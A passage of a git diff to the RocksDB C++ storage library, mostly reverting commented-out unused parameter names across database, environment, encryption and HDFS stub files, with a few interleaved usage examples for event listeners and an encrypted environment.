1 : 0; return true; } diff --git a/db/listener_test.cc b/db/listener_test.cc index 0ab129b1173..5b5f2266b31 100644 --- a/db/listener_test.cc +++ b/db/listener_test.cc @@ -46,11 +46,11 @@ class EventListenerTest : public DBTestBase { }; struct TestPropertiesCollector : public rocksdb::TablePropertiesCollector { - virtual rocksdb::Status AddUserKey(const rocksdb::Slice& /*key*/, - const rocksdb::Slice& /*value*/, - rocksdb::EntryType /*type*/, - rocksdb::SequenceNumber /*seq*/, - uint64_t /*file_size*/) override { + virtual rocksdb::Status AddUserKey(const rocksdb::Slice& key, + const rocksdb::Slice& value, + rocksdb::EntryType type, + rocksdb::SequenceNumber seq, + uint64_t file_size) override { return Status::OK(); } virtual rocksdb::Status Finish( @@ -73,7 +73,7 @@ struct TestPropertiesCollector : public rocksdb::TablePropertiesCollector { class TestPropertiesCollectorFactory : public TablePropertiesCollectorFactory { public: virtual TablePropertiesCollector* CreateTablePropertiesCollector( - TablePropertiesCollectorFactory::Context /*context*/) override { + TablePropertiesCollectorFactory::Context context) override { return new TestPropertiesCollector; } const char* Name() const override { return "TestTablePropertiesCollector"; } @@ -425,7 +425,7 @@ TEST_F(EventListenerTest, DisableBGCompaction) { class TestCompactionReasonListener : public EventListener { public: - void OnCompactionCompleted(DB* /*db*/, const CompactionJobInfo& ci) override { + void OnCompactionCompleted(DB* db, const CompactionJobInfo& ci) override { std::lock_guard lock(mutex_); compaction_reasons_.push_back(ci.compaction_reason); } @@ -807,8 +807,7 @@ class BackgroundErrorListener : public EventListener { public: BackgroundErrorListener(SpecialEnv* env) : env_(env), counter_(0) {} - void OnBackgroundError(BackgroundErrorReason /*reason*/, - Status* bg_error) override { + void OnBackgroundError(BackgroundErrorReason reason, Status* bg_error) override { if (counter_ == 0) { // suppress the first error and disable write-dropping such that a retry // can succeed. 
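For context on the listener_test.cc hunks above: a minimal sketch of a custom EventListener in the spirit of TestCompactionReasonListener. The class name CompactionReasonRecorder is invented for illustration; only the callback signature comes from include/rocksdb/listener.h.

#include <mutex>
#include <vector>
#include "rocksdb/db.h"
#include "rocksdb/listener.h"
#include "rocksdb/options.h"

// Records the reason reported for every completed compaction.
class CompactionReasonRecorder : public rocksdb::EventListener {
 public:
  void OnCompactionCompleted(rocksdb::DB* db,
                             const rocksdb::CompactionJobInfo& ci) override {
    std::lock_guard<std::mutex> lock(mutex_);
    reasons_.push_back(ci.compaction_reason);
  }

 private:
  std::mutex mutex_;  // callbacks may arrive from several background threads
  std::vector<rocksdb::CompactionReason> reasons_;
};

// Usage: listeners are registered on Options before DB::Open().
//   rocksdb::Options options;
//   options.listeners.push_back(std::make_shared<CompactionReasonRecorder>());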
diff --git a/db/malloc_stats.cc b/db/malloc_stats.cc index 6ea0d5e4744..7acca65123e 100644 --- a/db/malloc_stats.cc +++ b/db/malloc_stats.cc @@ -36,7 +36,7 @@ static void GetJemallocStatus(void* mstat_arg, const char* status) { } #endif // ROCKSDB_JEMALLOC -void DumpMallocStats(std::string* /*stats*/) { +void DumpMallocStats(std::string* stats) { #ifdef ROCKSDB_JEMALLOC MallocStatus mstat; const unsigned int kMallocStatusLen = 1000000; diff --git a/db/manual_compaction_test.cc b/db/manual_compaction_test.cc index f31a50b8191..039b9080ed3 100644 --- a/db/manual_compaction_test.cc +++ b/db/manual_compaction_test.cc @@ -46,9 +46,9 @@ class DestroyAllCompactionFilter : public CompactionFilter { public: DestroyAllCompactionFilter() {} - virtual bool Filter(int /*level*/, const Slice& /*key*/, - const Slice& existing_value, std::string* /*new_value*/, - bool* /*value_changed*/) const override { + virtual bool Filter(int level, const Slice& key, const Slice& existing_value, + std::string* new_value, + bool* value_changed) const override { return existing_value.ToString() == "destroy"; } diff --git a/db/memtable_list.cc b/db/memtable_list.cc index f7e43458026..8f710c2e970 100644 --- a/db/memtable_list.cc +++ b/db/memtable_list.cc @@ -152,7 +152,7 @@ bool MemTableListVersion::GetFromList(std::list* list, } Status MemTableListVersion::AddRangeTombstoneIterators( - const ReadOptions& read_opts, Arena* /*arena*/, + const ReadOptions& read_opts, Arena* arena, RangeDelAggregator* range_del_agg) { assert(range_del_agg != nullptr); for (auto& m : memlist_) { @@ -298,7 +298,7 @@ void MemTableList::PickMemtablesToFlush(autovector* ret) { } void MemTableList::RollbackMemtableFlush(const autovector& mems, - uint64_t /*file_number*/) { + uint64_t file_number) { AutoThreadOperationStageUpdater stage_updater( ThreadStatus::STAGE_MEMTABLE_ROLLBACK); assert(!mems.empty()); diff --git a/db/merge_test.cc b/db/merge_test.cc index c1b0cbfaefb..b6582b7a596 100644 --- a/db/merge_test.cc +++ b/db/merge_test.cc @@ -504,7 +504,7 @@ void runTest(int argc, const std::string& dbname, const bool use_ttl = false) { } } // namespace -int main(int argc, char* /*argv*/ []) { +int main(int argc, char *argv[]) { //TODO: Make this test like a general rocksdb unit-test rocksdb::port::InstallStackTraceHandler(); runTest(argc, test::TmpDir() + "/merge_testdb"); diff --git a/db/plain_table_db_test.cc b/db/plain_table_db_test.cc index 8fae9746d84..0b60332e53a 100644 --- a/db/plain_table_db_test.cc +++ b/db/plain_table_db_test.cc @@ -327,7 +327,7 @@ class TestPlainTableFactory : public PlainTableFactory { const TableReaderOptions& table_reader_options, unique_ptr&& file, uint64_t file_size, unique_ptr* table, - bool /*prefetch_index_and_filter_in_cache*/) const override { + bool prefetch_index_and_filter_in_cache) const override { TableProperties* props = nullptr; auto s = ReadTableProperties(file.get(), file_size, kPlainTableMagicNumber, diff --git a/db/prefix_test.cc b/db/prefix_test.cc index 6ac3ffb5d7b..a4ed201dad1 100644 --- a/db/prefix_test.cc +++ b/db/prefix_test.cc @@ -126,10 +126,10 @@ class TestKeyComparator : public Comparator { return "TestKeyComparator"; } - virtual void FindShortestSeparator(std::string* /*start*/, - const Slice& /*limit*/) const override {} + virtual void FindShortestSeparator(std::string* start, + const Slice& limit) const override {} - virtual void FindShortSuccessor(std::string* /*key*/) const override {} + virtual void FindShortSuccessor(std::string* key) const override {} }; namespace { diff --git 
a/db/table_cache.cc b/db/table_cache.cc index 60092ff610c..4dc56935fbc 100644 --- a/db/table_cache.cc +++ b/db/table_cache.cc @@ -30,7 +30,7 @@ namespace rocksdb { namespace { template <class T> -static void DeleteEntry(const Slice& /*key*/, void* value) { +static void DeleteEntry(const Slice& key, void* value) { T* typed_value = reinterpret_cast<T*>(value); delete typed_value; } @@ -41,7 +41,7 @@ static void UnrefEntry(void* arg1, void* arg2) { cache->Release(h); } -static void DeleteTableReader(void* arg1, void* /*arg2*/) { +static void DeleteTableReader(void* arg1, void* arg2) { TableReader* table_reader = reinterpret_cast<TableReader*>(arg1); delete table_reader; } diff --git a/db/table_properties_collector.cc b/db/table_properties_collector.cc index ed9f223cdda..a1f4dba97bb 100644 --- a/db/table_properties_collector.cc +++ b/db/table_properties_collector.cc @@ -12,8 +12,8 @@ namespace rocksdb { Status InternalKeyPropertiesCollector::InternalAdd(const Slice& key, - const Slice& /*value*/, - uint64_t /*file_size*/) { + const Slice& value, + uint64_t file_size) { ParsedInternalKey ikey; if (!ParseInternalKey(key, &ikey)) { return Status::InvalidArgument("Invalid internal key"); diff --git a/db/table_properties_collector.h b/db/table_properties_collector.h index 7216ec3190f..d8cd75689d5 100644 --- a/db/table_properties_collector.h +++ b/db/table_properties_collector.h @@ -73,7 +73,7 @@ class InternalKeyPropertiesCollectorFactory : public IntTblPropCollectorFactory { public: virtual IntTblPropCollector* CreateIntTblPropCollector( - uint32_t /*column_family_id*/) override { + uint32_t column_family_id) override { return new InternalKeyPropertiesCollector(); } diff --git a/db/table_properties_collector_test.cc b/db/table_properties_collector_test.cc index bf382b4fddc..66c66c02531 100644 --- a/db/table_properties_collector_test.cc +++ b/db/table_properties_collector_test.cc @@ -82,9 +82,8 @@ class RegularKeysStartWithA: public TablePropertiesCollector { return Status::OK(); } - Status AddUserKey(const Slice& user_key, const Slice& /*value*/, - EntryType type, SequenceNumber /*seq*/, - uint64_t file_size) override { + Status AddUserKey(const Slice& user_key, const Slice& value, EntryType type, + SequenceNumber seq, uint64_t file_size) override { // simply assume all user keys are not empty. if (user_key.data()[0] == 'A') { ++count_; @@ -134,7 +133,7 @@ class RegularKeysStartWithABackwardCompatible return Status::OK(); } - Status Add(const Slice& user_key, const Slice& /*value*/) override { + Status Add(const Slice& user_key, const Slice& value) override { // simply assume all user keys are not empty. if (user_key.data()[0] == 'A') { ++count_; @@ -162,8 +161,8 @@ class RegularKeysStartWithAInternal : public IntTblPropCollector { return Status::OK(); } - Status InternalAdd(const Slice& user_key, const Slice& /*value*/, - uint64_t /*file_size*/) override { + Status InternalAdd(const Slice& user_key, const Slice& value, + uint64_t file_size) override { // simply assume all user keys are not empty. 
if (user_key.data()[0] == 'A') { ++count_; @@ -194,7 +193,7 @@ class RegularKeysStartWithAFactory : public IntTblPropCollectorFactory, } } virtual IntTblPropCollector* CreateIntTblPropCollector( - uint32_t /*column_family_id*/) override { + uint32_t column_family_id) override { return new RegularKeysStartWithAInternal(); } const char* Name() const override { return "RegularKeysStartWithA"; } @@ -204,7 +203,7 @@ class RegularKeysStartWithAFactory : public IntTblPropCollectorFactory, class FlushBlockEveryThreePolicy : public FlushBlockPolicy { public: - virtual bool Update(const Slice& /*key*/, const Slice& /*value*/) override { + virtual bool Update(const Slice& key, const Slice& value) override { return (++count_ % 3U == 0); } @@ -221,8 +220,8 @@ class FlushBlockEveryThreePolicyFactory : public FlushBlockPolicyFactory { } FlushBlockPolicy* NewFlushBlockPolicy( - const BlockBasedTableOptions& /*table_options*/, - const BlockBuilder& /*data_block_builder*/) const override { + const BlockBasedTableOptions& table_options, + const BlockBuilder& data_block_builder) const override { return new FlushBlockEveryThreePolicy; } }; diff --git a/db/version_builder.cc b/db/version_builder.cc index 48264d4d704..bab8d11f5a5 100644 --- a/db/version_builder.cc +++ b/db/version_builder.cc @@ -185,7 +185,7 @@ class VersionBuilder::Rep { } } - void CheckConsistencyForDeletes(VersionEdit* /*edit*/, uint64_t number, + void CheckConsistencyForDeletes(VersionEdit* edit, uint64_t number, int level) { #ifdef NDEBUG if (!base_vstorage_->force_consistency_checks()) { diff --git a/db/version_edit.cc b/db/version_edit.cc index ebfc10584c9..b01f7bbdf70 100644 --- a/db/version_edit.cc +++ b/db/version_edit.cc @@ -198,7 +198,7 @@ static bool GetInternalKey(Slice* input, InternalKey* dst) { } } -bool VersionEdit::GetLevel(Slice* input, int* level, const char** /*msg*/) { +bool VersionEdit::GetLevel(Slice* input, int* level, const char** msg) { uint32_t v; if (GetVarint32(input, &v)) { *level = v; diff --git a/db/version_set.cc b/db/version_set.cc index aea3a62fad6..0069d86c1dd 100644 --- a/db/version_set.cc +++ b/db/version_set.cc @@ -528,7 +528,9 @@ class LevelFileIteratorState : public TwoLevelIteratorState { for_compaction_, nullptr /* arena */, skip_filters_, level_); } - bool PrefixMayMatch(const Slice& /*internal_key*/) override { return true; } + bool PrefixMayMatch(const Slice& internal_key) override { + return true; + } bool KeyReachedUpperBound(const Slice& internal_key) override { return read_options_.iterate_upper_bound != nullptr && @@ -2654,7 +2656,7 @@ void VersionSet::LogAndApplyCFHelper(VersionEdit* edit) { } void VersionSet::LogAndApplyHelper(ColumnFamilyData* cfd, - VersionBuilder* builder, Version* /*v*/, + VersionBuilder* builder, Version* v, VersionEdit* edit, InstrumentedMutex* mu) { mu->AssertHeld(); assert(!edit->IsColumnFamilyManipulation()); diff --git a/db/version_set.h b/db/version_set.h index 1e60098a63b..5a1f8d07d64 100644 --- a/db/version_set.h +++ b/db/version_set.h @@ -792,7 +792,7 @@ class VersionSet { struct LogReporter : public log::Reader::Reporter { Status* status; - virtual void Corruption(size_t /*bytes*/, const Status& s) override { + virtual void Corruption(size_t bytes, const Status& s) override { if (this->status->ok()) *this->status = s; } }; diff --git a/db/version_set_test.cc b/db/version_set_test.cc index 090e074cf0d..625d4592264 100644 --- a/db/version_set_test.cc +++ b/db/version_set_test.cc @@ -76,9 +76,7 @@ class CountingLogger : public Logger { public: CountingLogger() : 
log_count(0) {} using Logger::Logv; - virtual void Logv(const char* /*format*/, va_list /*ap*/) override { - log_count++; - } + virtual void Logv(const char* format, va_list ap) override { log_count++; } int log_count; }; diff --git a/db/wal_manager_test.cc b/db/wal_manager_test.cc index b0d8beee8a6..9f5cf273d24 100644 --- a/db/wal_manager_test.cc +++ b/db/wal_manager_test.cc @@ -72,7 +72,7 @@ class WalManagerTest : public testing::Test { } // NOT thread safe - void RollTheLog(bool /*archived*/) { + void RollTheLog(bool archived) { current_log_number_++; std::string fname = ArchivedLogFileName(dbname_, current_log_number_); unique_ptr file; diff --git a/db/write_batch.cc b/db/write_batch.cc index 042be5ab2f3..91be9a0dfa6 100644 --- a/db/write_batch.cc +++ b/db/write_batch.cc @@ -171,7 +171,7 @@ WriteBatch::~WriteBatch() { delete save_points_; } WriteBatch::Handler::~Handler() { } -void WriteBatch::Handler::LogData(const Slice& /*blob*/) { +void WriteBatch::Handler::LogData(const Slice& blob) { // If the user has not specified something to do with blobs, then we ignore // them. } @@ -469,7 +469,7 @@ void WriteBatchInternal::SetSequence(WriteBatch* b, SequenceNumber seq) { EncodeFixed64(&b->rep_[0], seq); } -size_t WriteBatchInternal::GetFirstOffset(WriteBatch* /*b*/) { +size_t WriteBatchInternal::GetFirstOffset(WriteBatch* b) { return WriteBatchInternal::kHeader; } @@ -1003,7 +1003,7 @@ class MemTableInserter : public WriteBatch::Handler { return Status::OK(); } - Status DeleteImpl(uint32_t /*column_family_id*/, const Slice& key, + Status DeleteImpl(uint32_t column_family_id, const Slice& key, const Slice& value, ValueType delete_type) { MemTable* mem = cf_mems_->GetMemTable(); mem->Add(sequence_, delete_type, key, value, concurrent_memtable_writes_, diff --git a/db/write_batch_test.cc b/db/write_batch_test.cc index 6f119634539..4fd156d9bae 100644 --- a/db/write_batch_test.cc +++ b/db/write_batch_test.cc @@ -434,7 +434,7 @@ TEST_F(WriteBatchTest, DISABLED_ManyUpdates) { struct NoopHandler : public WriteBatch::Handler { uint32_t num_seen = 0; char expected_char = 'A'; - virtual Status PutCF(uint32_t /*column_family_id*/, const Slice& key, + virtual Status PutCF(uint32_t column_family_id, const Slice& key, const Slice& value) override { EXPECT_EQ(kKeyValueSize, key.size()); EXPECT_EQ(kKeyValueSize, value.size()); @@ -449,22 +449,22 @@ TEST_F(WriteBatchTest, DISABLED_ManyUpdates) { ++num_seen; return Status::OK(); } - virtual Status DeleteCF(uint32_t /*column_family_id*/, - const Slice& /*key*/) override { + virtual Status DeleteCF(uint32_t column_family_id, + const Slice& key) override { ADD_FAILURE(); return Status::OK(); } - virtual Status SingleDeleteCF(uint32_t /*column_family_id*/, - const Slice& /*key*/) override { + virtual Status SingleDeleteCF(uint32_t column_family_id, + const Slice& key) override { ADD_FAILURE(); return Status::OK(); } - virtual Status MergeCF(uint32_t /*column_family_id*/, const Slice& /*key*/, - const Slice& /*value*/) override { + virtual Status MergeCF(uint32_t column_family_id, const Slice& key, + const Slice& value) override { ADD_FAILURE(); return Status::OK(); } - virtual void LogData(const Slice& /*blob*/) override { ADD_FAILURE(); } + virtual void LogData(const Slice& blob) override { ADD_FAILURE(); } virtual bool Continue() override { return num_seen < kNumUpdates; } } handler; @@ -489,7 +489,7 @@ TEST_F(WriteBatchTest, DISABLED_LargeKeyValue) { struct NoopHandler : public WriteBatch::Handler { int num_seen = 0; - virtual Status PutCF(uint32_t 
/*column_family_id*/, const Slice& key, + virtual Status PutCF(uint32_t column_family_id, const Slice& key, const Slice& value) override { EXPECT_EQ(kKeyValueSize, key.size()); EXPECT_EQ(kKeyValueSize, value.size()); @@ -500,22 +500,22 @@ TEST_F(WriteBatchTest, DISABLED_LargeKeyValue) { ++num_seen; return Status::OK(); } - virtual Status DeleteCF(uint32_t /*column_family_id*/, - const Slice& /*key*/) override { + virtual Status DeleteCF(uint32_t column_family_id, + const Slice& key) override { ADD_FAILURE(); return Status::OK(); } - virtual Status SingleDeleteCF(uint32_t /*column_family_id*/, - const Slice& /*key*/) override { + virtual Status SingleDeleteCF(uint32_t column_family_id, + const Slice& key) override { ADD_FAILURE(); return Status::OK(); } - virtual Status MergeCF(uint32_t /*column_family_id*/, const Slice& /*key*/, - const Slice& /*value*/) override { + virtual Status MergeCF(uint32_t column_family_id, const Slice& key, + const Slice& value) override { ADD_FAILURE(); return Status::OK(); } - virtual void LogData(const Slice& /*blob*/) override { ADD_FAILURE(); } + virtual void LogData(const Slice& blob) override { ADD_FAILURE(); } virtual bool Continue() override { return num_seen < 2; } } handler; diff --git a/db/write_callback_test.cc b/db/write_callback_test.cc index 41488b8c76d..9edf1c1581e 100644 --- a/db/write_callback_test.cc +++ b/db/write_callback_test.cc @@ -55,7 +55,9 @@ class WriteCallbackTestWriteCallback1 : public WriteCallback { class WriteCallbackTestWriteCallback2 : public WriteCallback { public: - Status Callback(DB* /*db*/) override { return Status::Busy(); } + Status Callback(DB *db) override { + return Status::Busy(); + } bool AllowWriteBatching() override { return true; } }; @@ -73,7 +75,7 @@ class MockWriteCallback : public WriteCallback { was_called_.store(other.was_called_.load()); } - Status Callback(DB* /*db*/) override { + Status Callback(DB* db) override { was_called_.store(true); if (should_fail_) { return Status::Busy(); diff --git a/db/write_thread.cc b/db/write_thread.cc index 6d466e4fd23..7063469967b 100644 --- a/db/write_thread.cc +++ b/db/write_thread.cc @@ -434,8 +434,7 @@ void WriteThread::EnterAsMemTableWriter(Writer* leader, last_writer->sequence + WriteBatchInternal::Count(last_writer->batch) - 1; } -void WriteThread::ExitAsMemTableWriter(Writer* /*self*/, - WriteGroup& write_group) { +void WriteThread::ExitAsMemTableWriter(Writer* self, WriteGroup& write_group) { Writer* leader = write_group.leader; Writer* last_writer = write_group.last_writer; diff --git a/env/env_encryption.cc b/env/env_encryption.cc index ff7f0810719..6b688a66020 100644 --- a/env/env_encryption.cc +++ b/env/env_encryption.cc @@ -844,9 +844,7 @@ static void decodeCTRParameters(const char *prefix, size_t blockSize, uint64_t & // CreateNewPrefix initialized an allocated block of prefix memory // for a new file. -Status CTREncryptionProvider::CreateNewPrefix(const std::string& /*fname*/, - char* prefix, - size_t prefixLength) { +Status CTREncryptionProvider::CreateNewPrefix(const std::string& fname, char *prefix, size_t prefixLength) { // Create & seed rnd. Random rnd((uint32_t)Env::Default()->NowMicros()); // Fill entire prefix block with random values. @@ -875,9 +873,7 @@ Status CTREncryptionProvider::CreateNewPrefix(const std::string& /*fname*/, // in plain text. // Returns the amount of space (starting from the start of the prefix) // that has been initialized. 
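A usage sketch for the CTREncryptionProvider touched above and in the hunk that follows, assuming the env_encryption.h API in this tree (ROT13BlockCipher, CTREncryptionProvider, NewEncryptedEnv); the block size and the /tmp path are arbitrary, and ROT13 is a test cipher, not real encryption.

#include <memory>
#include "rocksdb/db.h"
#include "rocksdb/env_encryption.h"
#include "rocksdb/options.h"

int main() {
  // Test-only cipher; swap in a real BlockCipher for actual protection.
  rocksdb::ROT13BlockCipher cipher(32);
  rocksdb::CTREncryptionProvider provider(cipher);
  std::unique_ptr<rocksdb::Env> env(
      rocksdb::NewEncryptedEnv(rocksdb::Env::Default(), &provider));

  rocksdb::Options options;
  options.create_if_missing = true;
  options.env = env.get();  // every file this DB writes goes through the cipher

  rocksdb::DB* db = nullptr;
  rocksdb::Status s = rocksdb::DB::Open(options, "/tmp/encrypted_db", &db);
  if (s.ok()) {
    s = db->Put(rocksdb::WriteOptions(), "key", "value");
    delete db;
  }
  return s.ok() ? 0 : 1;
}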
-size_t CTREncryptionProvider::PopulateSecretPrefixPart(char* /*prefix*/, - size_t /*prefixLength*/, - size_t /*blockSize*/) { +size_t CTREncryptionProvider::PopulateSecretPrefixPart(char *prefix, size_t prefixLength, size_t blockSize) { // Nothing to do here, put in custom data in override when needed. return 0; } @@ -902,10 +898,8 @@ Status CTREncryptionProvider::CreateCipherStream(const std::string& fname, const // CreateCipherStreamFromPrefix creates a block access cipher stream for a file given // given name and options. The given prefix is already decrypted. -Status CTREncryptionProvider::CreateCipherStreamFromPrefix( - const std::string& /*fname*/, const EnvOptions& /*options*/, - uint64_t initialCounter, const Slice& iv, const Slice& /*prefix*/, - unique_ptr* result) { +Status CTREncryptionProvider::CreateCipherStreamFromPrefix(const std::string& fname, const EnvOptions& options, + uint64_t initialCounter, const Slice& iv, const Slice& prefix, unique_ptr* result) { (*result) = unique_ptr(new CTRCipherStream(cipher_, iv.data(), initialCounter)); return Status::OK(); } diff --git a/env/env_hdfs.cc b/env/env_hdfs.cc index 6dbbd86273d..d98020c76b3 100644 --- a/env/env_hdfs.cc +++ b/env/env_hdfs.cc @@ -598,13 +598,13 @@ Status NewHdfsEnv(Env** hdfs_env, const std::string& fsname) { // dummy placeholders used when HDFS is not available namespace rocksdb { -Status HdfsEnv::NewSequentialFile(const std::string& /*fname*/, - unique_ptr* /*result*/, - const EnvOptions& /*options*/) { - return Status::NotSupported("Not compiled with hdfs support"); + Status HdfsEnv::NewSequentialFile(const std::string& fname, + unique_ptr* result, + const EnvOptions& options) { + return Status::NotSupported("Not compiled with hdfs support"); } - Status NewHdfsEnv(Env** /*hdfs_env*/, const std::string& /*fsname*/) { + Status NewHdfsEnv(Env** hdfs_env, const std::string& fsname) { return Status::NotSupported("Not compiled with hdfs support"); } } diff --git a/env/env_test.cc b/env/env_test.cc index 8606bb12a11..7fd71a3c430 100644 --- a/env/env_test.cc +++ b/env/env_test.cc @@ -1248,36 +1248,33 @@ TEST_P(EnvPosixTestWithParam, WritableFileWrapper) { inc(0); } - Status Append(const Slice& /*data*/) override { - inc(1); - return Status::OK(); - } - Status Truncate(uint64_t /*size*/) override { return Status::OK(); } + Status Append(const Slice& data) override { inc(1); return Status::OK(); } + Status Truncate(uint64_t size) override { return Status::OK(); } Status Close() override { inc(2); return Status::OK(); } Status Flush() override { inc(3); return Status::OK(); } Status Sync() override { inc(4); return Status::OK(); } Status Fsync() override { inc(5); return Status::OK(); } - void SetIOPriority(Env::IOPriority /*pri*/) override { inc(6); } + void SetIOPriority(Env::IOPriority pri) override { inc(6); } uint64_t GetFileSize() override { inc(7); return 0; } - void GetPreallocationStatus(size_t* /*block_size*/, - size_t* /*last_allocated_block*/) override { + void GetPreallocationStatus(size_t* block_size, + size_t* last_allocated_block) override { inc(8); } - size_t GetUniqueId(char* /*id*/, size_t /*max_size*/) const override { + size_t GetUniqueId(char* id, size_t max_size) const override { inc(9); return 0; } - Status InvalidateCache(size_t /*offset*/, size_t /*length*/) override { + Status InvalidateCache(size_t offset, size_t length) override { inc(10); return Status::OK(); } protected: - Status Allocate(uint64_t /*offset*/, uint64_t /*len*/) override { + Status Allocate(uint64_t offset, uint64_t len) 
override { inc(11); return Status::OK(); } - Status RangeSync(uint64_t /*offset*/, uint64_t /*nbytes*/) override { + Status RangeSync(uint64_t offset, uint64_t nbytes) override { inc(12); return Status::OK(); } diff --git a/env/io_posix.cc b/env/io_posix.cc index cf96795c443..c5b14d3effe 100644 --- a/env/io_posix.cc +++ b/env/io_posix.cc @@ -443,7 +443,7 @@ PosixMmapReadableFile::~PosixMmapReadableFile() { } Status PosixMmapReadableFile::Read(uint64_t offset, size_t n, Slice* result, - char* /*scratch*/) const { + char* scratch) const { Status s; if (offset > length_) { *result = Slice(); @@ -922,7 +922,7 @@ size_t PosixWritableFile::GetUniqueId(char* id, size_t max_size) const { */ PosixRandomRWFile::PosixRandomRWFile(const std::string& fname, int fd, - const EnvOptions& /*options*/) + const EnvOptions& options) : filename_(fname), fd_(fd) {} PosixRandomRWFile::~PosixRandomRWFile() { diff --git a/env/io_posix.h b/env/io_posix.h index e83f2df7332..69c98438f27 100644 --- a/env/io_posix.h +++ b/env/io_posix.h @@ -201,7 +201,7 @@ class PosixMmapFile : public WritableFile { // Means Close() will properly take care of truncate // and it does not need any additional information - virtual Status Truncate(uint64_t /*size*/) override { return Status::OK(); } + virtual Status Truncate(uint64_t size) override { return Status::OK(); } virtual Status Close() override; virtual Status Append(const Slice& data) override; virtual Status Flush() override; diff --git a/env/mock_env.cc b/env/mock_env.cc index b59047bdeb6..79a4f8c44a6 100644 --- a/env/mock_env.cc +++ b/env/mock_env.cc @@ -445,8 +445,8 @@ MockEnv::~MockEnv() { // Partial implementation of the Env interface. Status MockEnv::NewSequentialFile(const std::string& fname, - unique_ptr* result, - const EnvOptions& /*soptions*/) { + unique_ptr* result, + const EnvOptions& soptions) { auto fn = NormalizePath(fname); MutexLock lock(&mutex_); if (file_map_.find(fn) == file_map_.end()) { @@ -462,8 +462,8 @@ Status MockEnv::NewSequentialFile(const std::string& fname, } Status MockEnv::NewRandomAccessFile(const std::string& fname, - unique_ptr* result, - const EnvOptions& /*soptions*/) { + unique_ptr* result, + const EnvOptions& soptions) { auto fn = NormalizePath(fname); MutexLock lock(&mutex_); if (file_map_.find(fn) == file_map_.end()) { @@ -480,7 +480,7 @@ Status MockEnv::NewRandomAccessFile(const std::string& fname, Status MockEnv::NewRandomRWFile(const std::string& fname, unique_ptr* result, - const EnvOptions& /*soptions*/) { + const EnvOptions& soptions) { auto fn = NormalizePath(fname); MutexLock lock(&mutex_); if (file_map_.find(fn) == file_map_.end()) { @@ -523,8 +523,8 @@ Status MockEnv::NewWritableFile(const std::string& fname, return Status::OK(); } -Status MockEnv::NewDirectory(const std::string& /*name*/, - unique_ptr* result) { +Status MockEnv::NewDirectory(const std::string& name, + unique_ptr* result) { result->reset(new MockEnvDirectory()); return Status::OK(); } diff --git a/hdfs/env_hdfs.h b/hdfs/env_hdfs.h index 2ed6ba6d8a6..3a62bc8cb92 100644 --- a/hdfs/env_hdfs.h +++ b/hdfs/env_hdfs.h @@ -245,7 +245,7 @@ static const Status notsup; class HdfsEnv : public Env { public: - explicit HdfsEnv(const std::string& /*fsname*/) { + explicit HdfsEnv(const std::string& fsname) { fprintf(stderr, "You have not build rocksdb with HDFS support\n"); fprintf(stderr, "Please see hdfs/README for details\n"); abort(); @@ -258,125 +258,112 @@ class HdfsEnv : public Env { unique_ptr* result, const EnvOptions& options) override; - virtual Status 
NewRandomAccessFile(const std::string& /*fname*/, - unique_ptr* /*result*/, - const EnvOptions& /*options*/) override { + virtual Status NewRandomAccessFile(const std::string& fname, + unique_ptr* result, + const EnvOptions& options) override { return notsup; } - virtual Status NewWritableFile(const std::string& /*fname*/, - unique_ptr* /*result*/, - const EnvOptions& /*options*/) override { + virtual Status NewWritableFile(const std::string& fname, + unique_ptr* result, + const EnvOptions& options) override { return notsup; } - virtual Status NewDirectory(const std::string& /*name*/, - unique_ptr* /*result*/) override { + virtual Status NewDirectory(const std::string& name, + unique_ptr* result) override { return notsup; } - virtual Status FileExists(const std::string& /*fname*/) override { + virtual Status FileExists(const std::string& fname) override { return notsup; } - virtual Status GetChildren(const std::string& /*path*/, - std::vector* /*result*/) override { + virtual Status GetChildren(const std::string& path, + std::vector* result) override { return notsup; } - virtual Status DeleteFile(const std::string& /*fname*/) override { + virtual Status DeleteFile(const std::string& fname) override { return notsup; } - virtual Status CreateDir(const std::string& /*name*/) override { - return notsup; - } + virtual Status CreateDir(const std::string& name) override { return notsup; } - virtual Status CreateDirIfMissing(const std::string& /*name*/) override { + virtual Status CreateDirIfMissing(const std::string& name) override { return notsup; } - virtual Status DeleteDir(const std::string& /*name*/) override { - return notsup; - } + virtual Status DeleteDir(const std::string& name) override { return notsup; } - virtual Status GetFileSize(const std::string& /*fname*/, - uint64_t* /*size*/) override { + virtual Status GetFileSize(const std::string& fname, + uint64_t* size) override { return notsup; } - virtual Status GetFileModificationTime(const std::string& /*fname*/, - uint64_t* /*time*/) override { + virtual Status GetFileModificationTime(const std::string& fname, + uint64_t* time) override { return notsup; } - virtual Status RenameFile(const std::string& /*src*/, - const std::string& /*target*/) override { + virtual Status RenameFile(const std::string& src, + const std::string& target) override { return notsup; } - virtual Status LinkFile(const std::string& /*src*/, - const std::string& /*target*/) override { + virtual Status LinkFile(const std::string& src, + const std::string& target) override { return notsup; } - virtual Status LockFile(const std::string& /*fname*/, - FileLock** /*lock*/) override { + virtual Status LockFile(const std::string& fname, FileLock** lock) override { return notsup; } - virtual Status UnlockFile(FileLock* /*lock*/) override { return notsup; } + virtual Status UnlockFile(FileLock* lock) override { return notsup; } - virtual Status NewLogger(const std::string& /*fname*/, - shared_ptr* /*result*/) override { + virtual Status NewLogger(const std::string& fname, + shared_ptr* result) override { return notsup; } - virtual void Schedule(void (*/*function*/)(void* arg), void* /*arg*/, - Priority /*pri*/ = LOW, void* /*tag*/ = nullptr, - void (*/*unschedFunction*/)(void* arg) = 0) override {} + virtual void Schedule(void (*function)(void* arg), void* arg, + Priority pri = LOW, void* tag = nullptr, + void (*unschedFunction)(void* arg) = 0) override {} - virtual int UnSchedule(void* /*tag*/, Priority /*pri*/) override { return 0; } + virtual int UnSchedule(void* tag, 
Priority pri) override { return 0; } - virtual void StartThread(void (*/*function*/)(void* arg), - void* /*arg*/) override {} + virtual void StartThread(void (*function)(void* arg), void* arg) override {} virtual void WaitForJoin() override {} virtual unsigned int GetThreadPoolQueueLen( - Priority /*pri*/ = LOW) const override { + Priority pri = LOW) const override { return 0; } - virtual Status GetTestDirectory(std::string* /*path*/) override { - return notsup; - } + virtual Status GetTestDirectory(std::string* path) override { return notsup; } virtual uint64_t NowMicros() override { return 0; } - virtual void SleepForMicroseconds(int /*micros*/) override {} + virtual void SleepForMicroseconds(int micros) override {} - virtual Status GetHostName(char* /*name*/, uint64_t /*len*/) override { + virtual Status GetHostName(char* name, uint64_t len) override { return notsup; } - virtual Status GetCurrentTime(int64_t* /*unix_time*/) override { - return notsup; - } + virtual Status GetCurrentTime(int64_t* unix_time) override { return notsup; } - virtual Status GetAbsolutePath(const std::string& /*db_path*/, - std::string* 